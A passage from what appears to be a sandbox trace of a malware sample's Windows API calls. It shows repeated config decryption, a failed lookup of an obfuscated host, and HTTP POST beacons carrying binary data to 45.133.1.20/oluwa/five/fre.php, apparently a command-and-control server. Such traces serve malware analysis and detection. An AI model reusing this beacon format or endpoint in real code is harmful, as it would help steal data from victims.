(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.230] GetProcessHeap () returned 0x6a0000 [0223.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0223.230] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.230] GetProcessHeap () returned 0x6a0000 [0223.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0223.231] GetProcessHeap () returned 0x6a0000 [0223.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.231] GetProcessHeap () returned 0x6a0000 [0223.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0223.232] GetProcessHeap () returned 0x6a0000 [0223.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0223.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.233] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0223.246] GetProcessHeap () returned 0x6a0000 [0223.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0223.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.247] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0223.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.249] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.250] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.250] GetProcessHeap () returned 0x6a0000 [0223.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0223.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.251] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0223.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.252] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0223.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.253] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0223.253] GetProcessHeap () returned 0x6a0000 [0223.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.254] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0223.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.255] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0223.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0223.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0223.259] GetProcessHeap () returned 0x6a0000 [0223.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0223.259] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0223.259] GetProcessHeap () returned 0x6a0000 [0223.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0223.259] socket (af=2, type=1, protocol=6) returned 0x684 [0223.260] connect (s=0x684, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0223.288] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0223.288] GetProcessHeap () returned 0x6a0000 [0223.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0223.288] GetProcessHeap () returned 0x6a0000 [0223.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0223.291] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.292] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.292] GetProcessHeap () returned 0x6a0000 [0223.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0223.292] GetProcessHeap () returned 0x6a0000 [0223.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.293] GetProcessHeap () returned 0x6a0000 [0223.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0223.293] GetProcessHeap () returned 0x6a0000 [0223.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0223.294] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.295] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.295] GetProcessHeap () returned 0x6a0000 [0223.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0223.295] GetProcessHeap () returned 0x6a0000 [0223.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.295] send (s=0x684, buf=0x6b5c98*, len=242, flags=0) returned 242 [0223.296] send (s=0x684, buf=0x6bb998*, len=159, flags=0) returned 159 [0223.296] GetProcessHeap () returned 0x6a0000 [0223.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0223.296] recv (in: s=0x684, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0223.364] GetProcessHeap () returned 0x6a0000 [0223.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0223.364] GetProcessHeap () returned 0x6a0000 [0223.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0223.365] GetProcessHeap () returned 0x6a0000 [0223.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0223.365] GetProcessHeap () returned 0x6a0000 [0223.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0223.365] closesocket (s=0x684) returned 0 [0223.366] GetProcessHeap () returned 0x6a0000 [0223.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0223.366] GetProcessHeap () returned 0x6a0000 [0223.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.366] GetProcessHeap () returned 0x6a0000 [0223.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0223.368] GetProcessHeap () returned 0x6a0000 [0223.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0223.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x728) returned 0x684 [0223.370] Sleep (dwMilliseconds=0xea60) [0223.371] GetProcessHeap () returned 0x6a0000 [0223.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0223.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.372] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0223.447] GetProcessHeap () returned 0x6a0000 [0223.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d84a8 [0223.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.449] CryptImportKey (in: hProv=0x6bf278, pbData=0x6d84a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0223.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.450] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.451] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.451] GetProcessHeap () returned 0x6a0000 [0223.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d84a8 | out: hHeap=0x6a0000) returned 1 [0223.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.452] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0223.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.453] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0223.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.454] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0223.454] GetProcessHeap () returned 0x6a0000 [0223.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.456] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.457] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.459] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.459] GetProcessHeap () returned 0x6a0000 [0223.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0223.459] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.459] GetProcessHeap () returned 0x6a0000 [0223.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0223.460] GetProcessHeap () returned 0x6a0000 [0223.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.461] GetProcessHeap () returned 0x6a0000 [0223.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0223.462] GetProcessHeap () returned 0x6a0000 [0223.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0223.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0223.476] GetProcessHeap () returned 0x6a0000 [0223.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9c08 [0223.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.477] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9c08, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0223.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.480] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.481] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.481] GetProcessHeap () returned 0x6a0000 [0223.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c08 | out: hHeap=0x6a0000) returned 1 [0223.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.489] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0223.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.490] CryptDestroyKey (hKey=0x6ad020) returned 1 [0223.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.490] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0223.490] GetProcessHeap () returned 0x6a0000 [0223.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.491] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0223.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.492] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0223.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.493] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0223.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0223.494] GetProcessHeap () returned 0x6a0000 [0223.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0223.494] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0223.494] GetProcessHeap () returned 0x6a0000 [0223.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0223.494] socket (af=2, type=1, protocol=6) returned 0x688 [0223.495] connect (s=0x688, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0223.518] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0223.518] GetProcessHeap () returned 0x6a0000 [0223.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0223.518] GetProcessHeap () returned 0x6a0000 [0223.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0223.519] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.520] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.520] GetProcessHeap () returned 0x6a0000 [0223.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0223.520] GetProcessHeap () returned 0x6a0000 [0223.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.520] GetProcessHeap () returned 0x6a0000 [0223.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0223.520] GetProcessHeap () returned 0x6a0000 [0223.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0223.522] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.523] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.523] GetProcessHeap () returned 0x6a0000 [0223.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0223.523] GetProcessHeap () returned 0x6a0000 [0223.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.523] send (s=0x688, buf=0x6b5c98*, len=242, flags=0) returned 242 [0223.524] send (s=0x688, buf=0x6bb998*, len=159, flags=0) returned 159 [0223.524] GetProcessHeap () returned 0x6a0000 [0223.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0223.524] recv (in: s=0x688, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0223.595] GetProcessHeap () returned 0x6a0000 [0223.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0223.596] GetProcessHeap () returned 0x6a0000 [0223.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0223.597] GetProcessHeap () returned 0x6a0000 [0223.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0223.597] GetProcessHeap () returned 0x6a0000 [0223.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0223.598] closesocket (s=0x688) returned 0 [0223.598] GetProcessHeap () returned 0x6a0000 [0223.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0223.599] GetProcessHeap () returned 0x6a0000 [0223.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.601] GetProcessHeap () returned 0x6a0000 [0223.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0223.602] GetProcessHeap () returned 0x6a0000 [0223.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0223.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xecc) returned 0x688 [0223.604] Sleep (dwMilliseconds=0xea60) [0223.606] GetProcessHeap () returned 0x6a0000 [0223.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0223.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0223.626] GetProcessHeap () returned 0x6a0000 [0223.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0223.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.627] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0223.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.629] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.630] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.630] GetProcessHeap () returned 0x6a0000 [0223.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0223.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.632] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0223.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.635] CryptDestroyKey (hKey=0x6ad020) returned 1 [0223.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.636] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0223.636] GetProcessHeap () returned 0x6a0000 [0223.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.637] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.643] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.645] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.646] GetProcessHeap () returned 0x6a0000 [0223.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0223.646] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.647] GetProcessHeap () returned 0x6a0000 [0223.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0223.647] 